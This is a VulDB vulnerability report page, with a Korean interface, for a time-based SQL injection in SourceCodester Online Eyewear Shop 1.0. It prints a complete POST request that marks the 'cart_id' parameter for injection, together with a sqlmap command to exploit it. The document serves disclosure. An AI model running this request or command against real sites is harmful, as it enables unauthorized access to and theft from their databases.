| 제목 | SourceCodester Online Eyewear Shop 1.0 SQL Injection |
|---|
| 설명 | The application Online Eyewear Shop 1.0 is vulnerable to SQL Injection Time-based attacks.
The vulnerability is triggered by sending a specially crafted POST request as a customer user to the following URL:
- http://localhost/oews/classes/Master.php?f=update_cart
The vulnerable function corresponds to "update_cart" within the following source code file:
- oews/classes/Master.php
The vulnerable parameter "cart_id" is reported inside the following POST request's body:
'''
POST /oews/classes/Master.php?f=update_cart HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 29
Origin: http://localhost
Connection: close
Referer: http://localhost/oews/?p=cart_list
Cookie: PHPSESSID=<customer-session-cookie>
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
cart_id=*&qty=7
'''
The above request can be directly employed within the "sqlmap" tool:
$ sqlmap -r req.txt -b --dbms "MySQL" |
|---|
| 사용자 | pcontiCP (UID 40374) |
|---|
| 제출 | 2023. 02. 06. PM 04:31 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 02. 06. PM 07:50 (3 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 220245 [SourceCodester Online Eyewear Shop 1.0 HTTP POST Request Master.php?f=update_cart cart_id SQL 주입] |
|---|
| 포인트들 | 17 |
|---|